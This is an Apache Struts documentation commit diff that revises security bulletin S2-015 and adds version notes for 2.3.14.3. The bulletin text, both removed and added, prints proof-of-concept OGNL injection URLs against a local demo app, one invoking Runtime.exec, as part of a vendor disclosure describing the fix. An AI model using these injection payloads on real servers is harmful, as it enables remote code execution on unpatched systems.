Author: lukaszlenart
Date: Wed Jun 5 05:14:58 2013
New Revision: 864455
Log:
Updates draft docs
Added:
websites/production/struts/content/development/2.x/docs/version-notes-23143.html
Modified:
websites/production/struts/content/development/2.x/docs/guides.html
websites/production/struts/content/development/2.x/docs/migration-guide.html
websites/production/struts/content/development/2.x/docs/s2-015.html
websites/production/struts/content/development/2.x/docs/security-bulletins.html
websites/production/struts/content/development/2.x/docs/wildcard-method-selection.html
Modified: websites/production/struts/content/development/2.x/docs/guides.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/guides.html
(original)
+++ websites/production/struts/content/development/2.x/docs/guides.html Wed Jun
5 05:14:58 2013
@@ -353,7 +353,7 @@ under the License.
<UL>
<LI><A href="version-notes-2315.html" title="Version Notes
2.3.15">Version Notes 2.3.15</A> - TBR</LI>
- <LI><A
href="https://cwiki.apache.org/confluence/display/WW/Version%20Notes%202.3.14.3";
title="Version Notes 2.3.14.3">Version Notes 2.3.14.3</A></LI>
+ <LI><A href="version-notes-23143.html" title="Version Notes
2.3.14.3">Version Notes 2.3.14.3</A></LI>
<LI><A href="version-notes-23142.html" title="Version Notes
2.3.14.2">Version Notes 2.3.14.2</A></LI>
<LI><A href="version-notes-23141.html" title="Version Notes
2.3.14.1">Version Notes 2.3.14.1</A></LI>
<LI><A href="version-notes-2314.html" title="Version Notes
2.3.14">Version Notes 2.3.14</A></LI>
Modified:
websites/production/struts/content/development/2.x/docs/migration-guide.html
==============================================================================
---
websites/production/struts/content/development/2.x/docs/migration-guide.html
(original)
+++
websites/production/struts/content/development/2.x/docs/migration-guide.html
Wed Jun 5 05:14:58 2013
@@ -130,7 +130,7 @@ under the License.
<UL>
<LI><A href="version-notes-2315.html" title="Version Notes
2.3.15">Version Notes 2.3.15</A> - TBR</LI>
- <LI><A
href="https://cwiki.apache.org/confluence/display/WW/Version%20Notes%202.3.14.3";
title="Version Notes 2.3.14.3">Version Notes 2.3.14.3</A></LI>
+ <LI><A href="version-notes-23143.html" title="Version Notes
2.3.14.3">Version Notes 2.3.14.3</A></LI>
<LI><A href="version-notes-23142.html" title="Version Notes
2.3.14.2">Version Notes 2.3.14.2</A></LI>
<LI><A href="version-notes-23141.html" title="Version Notes
2.3.14.1">Version Notes 2.3.14.1</A></LI>
<LI><A href="version-notes-2314.html" title="Version Notes
2.3.14">Version Notes 2.3.14</A></LI>
@@ -444,7 +444,7 @@ under the License.
<A href="version-notes-23142.html" title="Version
Notes 2.3.14.2">Version Notes 2.3.14.2</A>
<SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
<BR>
- <A
href="https://cwiki.apache.org/confluence/display/WW/Version%20Notes%202.3.14.3";
title="Version Notes 2.3.14.3">Version Notes 2.3.14.3</A>
+ <A href="version-notes-23143.html" title="Version
Notes 2.3.14.3">Version Notes 2.3.14.3</A>
<SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
<BR>
</DIV>
Modified: websites/production/struts/content/development/2.x/docs/s2-015.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-015.html
(original)
+++ websites/production/struts/content/development/2.x/docs/s2-015.html Wed Jun
5 05:14:58 2013
@@ -126,7 +126,7 @@ under the License.
<H2><A name="S2-015-Summary"></A>Summary</H2>
-<P>A vulnerability introduced by forcing parameter inclusion in the
<EM>URL</EM> and <EM>Anchor</EM> Tag allows remote command execution, session
access and manipulation and XSS attacks</P>
+<P>A vulnerability introduced by wildcard matching mechanism or double
evaluation of OGNL Expression allows remote command execution.</P>
<DIV class="table-wrap">
@@ -145,19 +145,19 @@ under the License.
</TR>
<TR>
<TH class="confluenceTh">Recommendation</TH>
-<TD class="confluenceTd">Developers should immediately upgrade to <A
href="http://struts.apache.org/download.cgi#struts23142"; class="external-link"
rel="nofollow">Struts 2.3.14.2</A></TD>
+<TD class="confluenceTd">Developers should immediately upgrade to <A
href="http://struts.apache.org/download.cgi#struts23143"; class="external-link"
rel="nofollow">Struts 2.3.14.3</A></TD>
</TR>
<TR>
<TH class="confluenceTh">Affected Software</TH>
-<TD class="confluenceTd"> Struts 2.0.0 - Struts 2.3.14.1 </TD>
+<TD class="confluenceTd"> Struts 2.0.0 - Struts 2.3.14.2 </TD>
</TR>
<TR>
<TH class="confluenceTh">Reporter</TH>
-<TD class="confluenceTd"> Eric Kobrin and Douglas Rodrigues (Akamai), Coverity
Security Research Laboratory, NSFOCUS Security Team </TD>
+<TD class="confluenceTd"> Jon Passki from Coverity Security Research
Laboratory reported directly to security@struts.a.o and via <A
href="https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection";
class="external-link" rel="nofollow">blog post</A> </TD>
</TR>
<TR>
<TH class="confluenceTh">CVE Identifier</TH>
-<TD class="confluenceTd"><A
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115";
class="external-link" rel="nofollow">CVE-2013-2115</A>, <A
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1966";
class="external-link" rel="nofollow">CVE-2013-1966</A></TD>
+<TD class="confluenceTd"><A
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2135";
class="external-link" rel="nofollow">CVE-2013-2135</A>, <A
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2134";
class="external-link" rel="nofollow">CVE-2013-2134</A></TD>
</TR>
</TBODY></TABLE>
</DIV>
@@ -165,73 +165,89 @@ under the License.
<H2><A name="S2-015-Problem"></A>Problem</H2>
-<P>Both the <A
href="http://struts.apache.org/release/2.3.x/struts2-core/apidocs/org/apache/struts2/components/URL.html";
class="external-link" rel="nofollow"><EM>s:url</EM></A> and <A
href="http://struts.apache.org/release/2.3.x/struts2-core/apidocs/org/apache/struts2/components/Anchor.html";
class="external-link" rel="nofollow"><EM>s:a</EM></A> tag provide an
<EM>includeParams</EM> attribute. </P>
+<P>Struts 2 allows define action mapping base on wildcards, like in example
below:</P>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent
panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag"><action name=<SPAN
class="code-quote">"*"</SPAN> class=<SPAN
class="code-quote">"example.ExampleSupport"</SPAN>></SPAN>
+ <SPAN class="code-tag"><result></SPAN>/example/{1}.jsp<SPAN
class="code-tag"></result></SPAN>
+<SPAN class="code-tag"></action></SPAN>
+</PRE>
+</DIV></DIV>
-<P>The main scope of that attribute is to understand whether includes http
request parameter or not. </P>
-
-<P>The allowed values of includeParams are:</P>
-<OL>
- <LI><EM>none</EM> - include no parameters in the URL (default)</LI>
- <LI><EM>get</EM> - include only GET parameters in the URL</LI>
- <LI><EM>all</EM> - include both GET and POST parameters in the URL</LI>
-</OL>
+<P>If a request doesn't match any other defined action, it will be matched by
<TT>*</TT> and requested action name will be used to load JSP file base on the
name of action. And as value of {<TT>1</TT>} is threaten as an OGNL expression,
thus allow to execute arbitrary Java code on server side. This vulnerability is
combination of two problems:</P>
+<UL class="alternate" type="square">
+ <LI>requested action name isn't escaped or checked agains whitelist</LI>
+ <LI>double evaluation of an OGNL expression in
<TT>TextParseUtil.translateVariables</TT> when combination of <TT>$</TT> and
<TT>%</TT> open chars is used.</LI>
+</UL>
-<P>A request that included a specially crafted request parameter could be used
to inject arbitrary OGNL code into the stack, afterward used as request
parameter of an <EM>URL</EM> or <EM>A</EM> tag , which will cause a further
evaluation. </P>
+<H2><A name="S2-015-Proofofconcept"></A>Proof of concept</H2>
-<P>The second evaluation happens when the URL/A tag tries to resolve every
parameters present in the original request.<BR>
-This lets malicious users put arbitrary OGNL statements into any request
parameter (not necessarily managed by the code) and have it evaluated as an
OGNL expression to enable method execution and execute arbitrary methods,
bypassing Struts and OGNL library protections.</P>
+<H4><A name="S2-015-Wildcardmatching"></A>Wildcard matching</H4>
+<OL>
+ <LI>Run struts2-blank app</LI>
+ <LI>Open the following url, resulting in dynamic action name resolution
based on passed value of <TT>#foo</TT>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent
panelContent">
+<PRE class="code-java">http:<SPAN
class="code-comment">//localhost:8080/example/%24%7B%23foo%3D%27Menu%27%2C%23foo%7D</SPAN></PRE>
+</DIV></DIV>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent
panelContent">
+<PRE class="code-java">http:<SPAN
class="code-comment">//localhost:8080/example/${#foo='Menu',#foo}</SPAN></PRE>
+</DIV></DIV></LI>
+</OL>
-<P>The issue was originally addressed by Struts 2.3.14.1 and Security
Announcement <A href="s2-013.html" title="S2-013">S2-013</A>. However, the
solution introduced with 2.3.14.1 did not address all possible attack vectors,
such that <B>every</B> version of Struts 2 before 2.3.14.2 is still vulnerable
to such attacks.</P>
-<H2><A name="S2-015-Proofofconcept"></A>Proof of concept</H2>
+<P>As you can notice, action name is resolved based on user input and you can
put any arbitrary code to perform attack.</P>
+<H4><A name="S2-015-Doubleevaluationofanexpression"></A>Double evaluation of
an expression</H4>
<OL>
- <LI>Open HelloWorld.jsp present in the Struts Blank App and add to one
of the url/a tag the following parameter:
+ <LI>Open example.xml present in the Struts Blank App and change result
of HelloWorld action to one below:
<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent
panelContent">
-<PRE class="code-java">
- includeParams=<SPAN class="code-quote">"all"</SPAN>
+<PRE class="code-xml">
+<SPAN class="code-tag"><result type=<SPAN
class="code-quote">"httpheader"</SPAN>></SPAN>
+ <SPAN class="code-tag"><param name=<SPAN
class="code-quote">"headers.foobar"</SPAN>></SPAN>${message}<SPAN
class="code-tag"></param></SPAN>
+<SPAN class="code-tag"></result></SPAN>
</PRE>
-</DIV></DIV>
-<P>Such that the line will be something look like this:</P>
+</DIV></DIV></LI>
+ <LI>Open HelloWorld.java and change <TT>execute()</TT> method as below:
<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent
panelContent">
-<PRE class="code-xml">
-<SPAN class="code-tag"><s:url id=<SPAN
class="code-quote">"url"</SPAN> action=<SPAN
class="code-quote">"HelloWorld"</SPAN> includeParams=<SPAN
class="code-quote">"all"</SPAN>></SPAN>
+<PRE class="code-java">
+<SPAN class="code-keyword">public</SPAN> <SPAN
class="code-object">String</SPAN> execute() <SPAN
class="code-keyword">throws</SPAN> Exception {
+ <SPAN class="code-keyword">return</SPAN> SUCCESS;
+}
</PRE>
</DIV></DIV></LI>
<LI>Run struts2-blank app</LI>
- <LI>Open the following url, resulting in calc application opening on
Windows (try ....exec('open%20.')} to open a Finder window on Mac OS):
- <DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent
panelContent">
-<PRE class="code-java">http:<SPAN
class="code-comment">//localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=<SPAN
class="code-keyword">true</SPAN>,@java.lang.<SPAN
class="code-object">Runtime</SPAN>@getRuntime().exec('calc')}</SPAN></PRE>
-</DIV></DIV></LI>
- <LI>Open the following url to modify session content:
- <DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent
panelContent">
-<PRE class="code-java">http:<SPAN
class="code-comment">//localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]='<SPAN
class="code-keyword">true</SPAN>'}</SPAN></PRE>
-</DIV></DIV></LI>
- <LI>Open the following url to print out session content and in
combination with the previous example introduce arbitrary code into the
resulting HTML output:
- <DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent
panelContent">
-<PRE class="code-java">http:<SPAN
class="code-comment">//localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]}</SPAN></PRE>
+ <LI>Open the following url (you must have a tool to check response
headers)
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent
panelContent">
+<PRE class="code-java">http:<SPAN
class="code-comment">//localhost:8080/example/HelloWorld.action?message=%24{%25{1%2B2}}</SPAN></PRE>
+</DIV></DIV>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent
panelContent">
+<PRE class="code-java">http:<SPAN
class="code-comment">//localhost:8080/example/HelloWorld.action?message=${%{1+2}}</SPAN></PRE>
</DIV></DIV></LI>
+ <LI>Check value of <TT>foobar</TT> header, it should be <TT>3</TT></LI>
</OL>
-<P>As you will notice, in this case, there is no way to escape/sanitize the
malicious parameter, since it's not an expected parameter and even will not get
evaluated the request parameters are processed. </P>
+<P>As you can notice, passed value of <TT>message</TT> parameter was used to
set value of <TT>foobar</TT> header and the value was double evaluated - first
time when <TT>${message</TT>} was evaluated, secondly when parsed value
(<TT>${%{1+2</TT>}}) was evaluated again.</P>
<H2><A name="S2-015-Solution"></A>Solution</H2>
-<P>The URL rendering subsystem was changed to not pass any parameter name or
value to OGNL evaluation.</P>
+<P>With the new version actions' names whitelisting was introduced and by
default is set to accept actions that match the following regex:</P>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent
panelContent">
+<PRE class="code-java">[a-z]*[A-Z]*[0-9]*[.\-_!/]*</PRE>
+</DIV></DIV>
+<P>user can change the definition by setting up a new constant in struts.xml
as below:</P>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent
panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag"><constant name=<SPAN
class="code-quote">"struts.allowed.action.names"</SPAN> value=<SPAN
class="code-quote">"[a-zA-Z]*"</SPAN> /></SPAN>
+</PRE>
+</DIV></DIV>
-<P>The MemberAccess component's allowStaticMethodAccess property is now
immutable.</P>
+<P>Double evaluation of passed expression was removed from
<TT>OgnlTextParser</TT> which is used by
<TT>TextParseUtil.translateVariables</TT>.</P>
-<DIV class="panelMacro"><TABLE class="noteMacro"><COLGROUP><COL
width="24"><COL></COLGROUP><TR><TD valign="top"><IMG
src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif";
width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>Backward
Compatibility</B><BR>A small amount of very elaborated <EM>URL</EM> or
<EM>A</EM> tag usages depending on the now disabled evaluation might produce
unexpected results now.<BR>
-Please, ensure that
-<OL>
- <LI>all expressions that should get evaluated are explicitly introduced
via <EM>PARAM</EM> tags within <EM>URL</EM> or <EM>A</EM> tags.</LI>
- <LI>all expressions used in <EM>PARAM</EM> tags come from a sanitized
input.</LI>
-</OL>
-</TD></TR></TABLE></DIV>
+<DIV class="panelMacro"><TABLE class="noteMacro"><COLGROUP><COL
width="24"><COL></COLGROUP><TR><TD valign="top"><IMG
src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif";
width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>Backward
Compatibility</B><BR>There should be no problems with migration from previous
version.</TD></TR></TABLE></DIV>
-<DIV class="panelMacro"><TABLE class="warningMacro"><COLGROUP><COL
width="24"><COL></COLGROUP><TR><TD valign="top"><IMG
src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif";
width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>It is
strongly recommended to upgrade to <A
href="http://struts.apache.org/download.cgi#struts23142"; class="external-link"
rel="nofollow">Struts 2.3.14.2</A>, which contains the corrected OGNL and XWork
library.</B></TD></TR></TABLE></DIV>
+<DIV class="panelMacro"><TABLE class="warningMacro"><COLGROUP><COL
width="24"><COL></COLGROUP><TR><TD valign="top"><IMG
src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif";
width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>It is
strongly recommended to upgrade to <A
href="http://struts.apache.org/download.cgi#struts23143"; class="external-link"
rel="nofollow">Struts 2.3.14.3</A>.</B></TD></TR></TABLE></DIV>
</DIV>
Modified:
websites/production/struts/content/development/2.x/docs/security-bulletins.html
==============================================================================
---
websites/production/struts/content/development/2.x/docs/security-bulletins.html
(original)
+++
websites/production/struts/content/development/2.x/docs/security-bulletins.html
Wed Jun 5 05:14:58 2013
@@ -124,7 +124,7 @@ under the License.
<DIV class="pagecontent">
<DIV class="wiki-content">
<P>The following security bulletins are available:</P>
-<UL><LI><A href="s2-001.html" title="S2-001">S2-001</A> — <SPAN
class="smalltext">Remote code exploit on form validation
error</SPAN></LI><LI><A href="s2-002.html" title="S2-002">S2-002</A> —
<SPAN class="smalltext">Cross site scripting (XSS) vulnerability on
<s:url> and <s:a> tags</SPAN></LI><LI><A href="s2-003.html"
title="S2-003">S2-003</A> — <SPAN class="smalltext">XWork
ParameterInterceptors bypass allows OGNL statement execution</SPAN></LI><LI><A
href="s2-004.html" title="S2-004">S2-004</A> — <SPAN
class="smalltext">Directory traversal vulnerability while serving static
content</SPAN></LI><LI><A href="s2-005.html" title="S2-005">S2-005</A> —
<SPAN class="smalltext">XWork ParameterInterceptors bypass allows remote
command execution</SPAN></LI><LI><A href="s2-006.html"
title="S2-006">S2-006</A> — <SPAN class="smalltext">Multiple Cross-Site
Scripting (XSS) in XWork generated error pages</SPAN></LI><LI><A
href="s2-007.html" t
itle="S2-007">S2-007</A> — <SPAN class="smalltext">User input is
evaluated as an OGNL expression when there's a conversion
error</SPAN></LI><LI><A href="s2-008.html" title="S2-008">S2-008</A> —
<SPAN class="smalltext">Multiple critical vulnerabilities in
Struts2</SPAN></LI><LI><A href="s2-009.html" title="S2-009">S2-009</A> —
<SPAN class="smalltext">ParameterInterceptor vulnerability allows remote
command execution</SPAN></LI><LI><A href="s2-010.html"
title="S2-010">S2-010</A> — <SPAN class="smalltext">When using Struts 2
token mechanism for CSRF protection, token check may be bypassed by misusing
known session attributes</SPAN></LI><LI><A href="s2-011.html"
title="S2-011">S2-011</A> — <SPAN class="smalltext">Long request
parameter names might significantly promote the effectiveness of DOS
attacks</SPAN></LI><LI><A href="s2-012.html" title="S2-012">S2-012</A> —
<SPAN class="smalltext">Showcase app vulnerability allows remote command execut
ion</SPAN></LI><LI><A href="s2-013.html" title="S2-013">S2-013</A> —
<SPAN class="smalltext">A vulnerability, present in the <EM>includeParams</EM>
attribute of the <EM>URL</EM> and <EM>Anchor</EM> Tag, allows remote command
execution</SPAN></LI><LI><A href="s2-014.html" title="S2-014">S2-014</A>
— <SPAN class="smalltext">A vulnerability introduced by forcing parameter
inclusion in the <EM>URL</EM> and <EM>Anchor</EM> Tag allows remote command
execution, session access and manipulation and XSS attacks</SPAN></LI><LI><A
href="s2-015.html" title="S2-015">S2-015</A> — <SPAN class="smalltext">A
vulnerability introduced by wildcard matching mechanism or double evaluation of
OGNL Expression allows remote command execution</SPAN></LI></UL>
+<UL><LI><A href="s2-001.html" title="S2-001">S2-001</A> — <SPAN
class="smalltext">Remote code exploit on form validation
error</SPAN></LI><LI><A href="s2-002.html" title="S2-002">S2-002</A> —
<SPAN class="smalltext">Cross site scripting (XSS) vulnerability on
<s:url> and <s:a> tags</SPAN></LI><LI><A href="s2-003.html"
title="S2-003">S2-003</A> — <SPAN class="smalltext">XWork
ParameterInterceptors bypass allows OGNL statement execution</SPAN></LI><LI><A
href="s2-004.html" title="S2-004">S2-004</A> — <SPAN
class="smalltext">Directory traversal vulnerability while serving static
content</SPAN></LI><LI><A href="s2-005.html" title="S2-005">S2-005</A> —
<SPAN class="smalltext">XWork ParameterInterceptors bypass allows remote
command execution</SPAN></LI><LI><A href="s2-006.html"
title="S2-006">S2-006</A> — <SPAN class="smalltext">Multiple Cross-Site
Scripting (XSS) in XWork generated error pages</SPAN></LI><LI><A
href="s2-007.html" t
itle="S2-007">S2-007</A> — <SPAN class="smalltext">User input is
evaluated as an OGNL expression when there's a conversion
error</SPAN></LI><LI><A href="s2-008.html" title="S2-008">S2-008</A> —
<SPAN class="smalltext">Multiple critical vulnerabilities in
Struts2</SPAN></LI><LI><A href="s2-009.html" title="S2-009">S2-009</A> —
<SPAN class="smalltext">ParameterInterceptor vulnerability allows remote
command execution</SPAN></LI><LI><A href="s2-010.html"
title="S2-010">S2-010</A> — <SPAN class="smalltext">When using Struts 2
token mechanism for CSRF protection, token check may be bypassed by misusing
known session attributes</SPAN></LI><LI><A href="s2-011.html"
title="S2-011">S2-011</A> — <SPAN class="smalltext">Long request
parameter names might significantly promote the effectiveness of DOS
attacks</SPAN></LI><LI><A href="s2-012.html" title="S2-012">S2-012</A> —
<SPAN class="smalltext">Showcase app vulnerability allows remote command execut
ion</SPAN></LI><LI><A href="s2-013.html" title="S2-013">S2-013</A> —
<SPAN class="smalltext">A vulnerability, present in the <EM>includeParams</EM>
attribute of the <EM>URL</EM> and <EM>Anchor</EM> Tag, allows remote command
execution</SPAN></LI><LI><A href="s2-014.html" title="S2-014">S2-014</A>
— <SPAN class="smalltext">A vulnerability introduced by forcing parameter
inclusion in the <EM>URL</EM> and <EM>Anchor</EM> Tag allows remote command
execution, session access and manipulation and XSS attacks</SPAN></LI><LI><A
href="s2-015.html" title="S2-015">S2-015</A> — <SPAN class="smalltext">A
vulnerability introduced by wildcard matching mechanism or double evaluation of
OGNL Expression allows remote command execution.</SPAN></LI></UL>
</DIV>
<DIV class="tabletitle">
Added:
websites/production/struts/content/development/2.x/docs/version-notes-23143.html
==============================================================================
---
websites/production/struts/content/development/2.x/docs/version-notes-23143.html
(added)
+++
websites/production/struts/content/development/2.x/docs/version-notes-23143.html
Wed Jun 5 05:14:58 2013
@@ -0,0 +1,206 @@
+
+<!--
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements. See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership. The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE- 2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied. See the License for the
+specific language governing permissions and limitations
+under the License.
+-->
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd";>
+<HTML>
+ <HEAD>
+ <LINK type="text/css" rel="stylesheet"
href="https://struts.apache.org/css/default.css";>
+ <STYLE type="text/css">
+ .dp-highlighter {
+ width:95% !important;
+ }
+ </STYLE>
+ <STYLE type="text/css">
+ .footer {
+ background-image:
url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+ background-repeat: repeat-x;
+ background-position: left top;
+ padding-top: 4px;
+ color: #666;
+ }
+ </STYLE>
+ <SCRIPT type="text/javascript" language="javascript">
+ var hide = null;
+ var show = null;
+ var children = null;
+
+ function init() {
+ /* Search form initialization */
+ var form = document.forms['search'];
+ if (form != null) {
+ form.elements['domains'].value = location.hostname;
+ form.elements['sitesearch'].value = location.hostname;
+ }
+
+ /* Children initialization */
+ hide = document.getElementById('hide');
+ show = document.getElementById('show');
+ children = document.all != null ?
+ document.all['children'] :
+ document.getElementById('children');
+ if (children != null) {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ }
+
+ function showChildren() {
+ children.style.display = 'block';
+ show.style.display = 'none';
+ hide.style.display = 'inline';
+ }
+
+ function hideChildren() {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ </SCRIPT>
+ <TITLE>Version Notes 2.3.14.3</TITLE>
+ <META http-equiv="Content-Type" content="text/html;charset=UTF-8"></HEAD>
+ <BODY onload="init()">
+ <TABLE border="0" cellpadding="2" cellspacing="0" width="100%">
+ <TR class="topBar">
+ <TD align="left" valign="middle" class="topBarDiv" align="left"
nowrap="">
+ <A href="home.html" title="Apache Struts 2
Documentation">Apache Struts 2 Documentation</A> > <A
href="home.html" title="Home">Home</A> > <A href="guides.html"
title="Guides">Guides</A> > <A href="migration-guide.html"
title="Migration Guide">Migration Guide</A> > <A href=""
title="Version Notes 2.3.14.3">Version Notes 2.3.14.3</A>
+ </TD>
+ <TD align="right" valign="middle" nowrap="">
+ <FORM name="search" action="http://www.google.com/search";
method="get">
+ <INPUT type="hidden" name="ie" value="UTF-8">
+ <INPUT type="hidden" name="oe" value="UTF-8">
+ <INPUT type="hidden" name="domains" value="">
+ <INPUT type="hidden" name="sitesearch" value="">
+ <INPUT type="text" name="q" maxlength="255" value="">
+ <INPUT type="submit" name="btnG" value="Google Search">
+ </FORM>
+ </TD>
+ </TR>
+ </TABLE>
+
+ <DIV id="PageContent">
+ <DIV class="pageheader" style="padding: 6px 0px 0px 0px;">
+ <!-- We'll enable this once we figure out how to access (and save) the
logo resource -->
+ <!--img src="/wiki/images/confluence_logo.gif" style="float: left;
margin: 4px 4px 4px 10px;" border="0"-->
+ <DIV style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts
2 Documentation</DIV>
+ <DIV style="margin: 0px 10px 8px 10px" class="pagetitle">Version Notes
2.3.14.3</DIV>
+
+ <DIV class="greynavbar" align="right" style="padding: 2px 10px;
margin: 0px;">
+ <A
href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31823655";>
+ <IMG
src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"; height="16"
width="16" border="0" align="absmiddle" title="Edit Page"></A>
+ <A
href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31823655";>Edit
Page</A>
+
+ <A
href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW";>
+ <IMG
src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif";
height="16" width="16" border="0" align="absmiddle" title="Browse Space"></A>
+ <A
href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW";>Browse
Space</A>
+
+ <A
href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31823655";>
+ <IMG
src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif";
height="16" width="16" border="0" align="absmiddle" title="Add Page"></A>
+ <A
href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31823655";>Add
Page</A>
+
+ <A
href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31823655";>
+ <IMG
src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif";
height="16" width="16" border="0" align="absmiddle" title="Add News"></A>
+ <A
href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31823655";>Add
News</A>
+ </DIV>
+ </DIV>
+
+ <DIV class="pagecontent">
+ <DIV class="wiki-content">
+ <P><IMG class="emoticon"
src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif";
height="16" width="16" align="absmiddle" alt="" border="0"> These are the notes
for the Struts 2.3.14.3 distribution.</P>
+
+<P><IMG class="emoticon"
src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif";
height="16" width="16" align="absmiddle" alt="" border="0"> For prior notes in
this release series, see <A href="" title="Version Notes 2.3.14.3">Version
Notes 2.3.14.3</A></P>
+
+<UL>
+ <LI>If you are a Maven user, you might want to get started using the <A
href="struts-2-maven-archetypes.html" title="Struts 2 Maven Archetypes">Maven
Archetype</A>.</LI>
+ <LI>Another quick-start entry point is the <B>blank</B> application.
Rename and deploy the WAR as a starting point for your own development.</LI>
+</UL>
+
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader
panelHeader" style="border-bottom-width: 1px;"><B>Maven
Dependency</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag"><dependency></SPAN>
+ <SPAN class="code-tag"><groupId></SPAN>org.apache.struts<SPAN
class="code-tag"></groupId></SPAN>
+ <SPAN class="code-tag"><artifactId></SPAN>struts2-core<SPAN
class="code-tag"></artifactId></SPAN>
+ <SPAN class="code-tag"><version></SPAN>2.3.14.3<SPAN
class="code-tag"></version></SPAN>
+<SPAN class="code-tag"></dependency></SPAN>
+</PRE>
+</DIV></DIV>
+
+<P>You can also use Struts Archetype Catalog like below</P>
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader
panelHeader" style="border-bottom-width: 1px;"><B>Struts Archetype
Catalog</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-none">
+mvn archetype:generate -DarchetypeCatalog=http://struts.apache.org/
+</PRE>
+</DIV></DIV>
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader
panelHeader" style="border-bottom-width: 1px;"><B>Staging
Repository</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-xml"><SPAN class="code-tag"><repositories></SPAN>
+ <SPAN class="code-tag"><repository></SPAN>
+ <SPAN class="code-tag"><id></SPAN>apache.nexus<SPAN
class="code-tag"></id></SPAN>
+ <SPAN class="code-tag"><name></SPAN>ASF Nexus Staging<SPAN
class="code-tag"></name></SPAN>
+ <SPAN
class="code-tag"><url></SPAN>https://repository.apache.org/content/groups/staging/<SPAN
class="code-tag"></url></SPAN>
+ <SPAN class="code-tag"></repository></SPAN>
+<SPAN class="code-tag"></repositories></SPAN></PRE>
+</DIV></DIV>
+
+<H2><A name="VersionNotes2.3.14.3-InternalChanges"></A>Internal Changes</H2>
+
+<UL>
+ <LI>Whitelisting of actions' names was introduced and double evaluation
of OGNL expression was removed.</LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.14.3-IssueDetail"></A>Issue Detail</H3>
+
+<UL>
+ <LI><A
href="https://issues.apache.org/jira/secure/ReleaseNote.jspa?version=12324579&projectId=12311041";
class="external-link" rel="nofollow">JIRA Release Notes 2.3.14.3</A></LI>
+ <LI><A href="s2-015.html" title="S2-015">Security Bulletin
S2-015</A></LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.14.3-IssueList"></A>Issue List</H3>
+
+<UL>
+ <LI><A href="https://issues.apache.org/jira/issues/?filter=12324236";
class="external-link" rel="nofollow">Struts 2.3.14.3 DONE</A></LI>
+ <LI><A href="https://issues.apache.org/jira/issues/?filter=12323783";
